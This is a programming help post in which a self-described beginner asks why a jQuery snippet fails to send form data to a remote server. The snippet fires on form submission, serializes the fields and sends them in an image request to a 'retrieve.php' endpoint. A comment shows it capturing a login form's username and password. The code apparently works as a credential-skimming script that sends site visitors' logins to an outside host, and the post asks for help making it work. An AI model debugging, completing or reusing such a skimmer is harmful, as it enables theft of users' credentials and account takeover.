# Error when trying to make new Img.src() request with a Javascript variable value

Tags: javascript

I have a part of my Javascript code which gathers some info and send it to a server, once a user submit a Form on a website:

```
var a = {"Event":"Form", "Current":document.URL, "Info":$(this).attr('action')};
$.each($(this).serializeArray(), function(i, f) { l[f.name] = f.value; });
new Image().src = "http://website.com/config/php_conf/retrieve.php?data="+ "Current:" + document.URL + "Info:" + $(this).attr('action');
```

The problem is on the third line, how can I include `$(this).attr('action')` to be sent to the server, the same way as `document.URL` is sent without any problem. On the server I retrieve document.URL value, but I don't retrieve anything with `$(this.attr('action')`.

I tried replacing the third line with the following code:

`new Image().src = "http://website.com/config/php_conf/retrieve.php?data=" + a;`

Still I didn't solve it because on server logs, I got `[object][object]` as results.

I am very new with Javascript, so any help would be appreciated.

Comment: How is the url suppose to look?

Comment: The request will look something like: http://website.com/config/php_conf/retrieve.php?data="Current:http://www.demo.-website.com/login-form/Info:username:username_value&password=password_value

On browser, the code works perfectly, $(this.attr('action') will shows up:

```
Target: 
username:hello 
password:secret 
```

Comment: Putting credentials in a URL isn't a good idea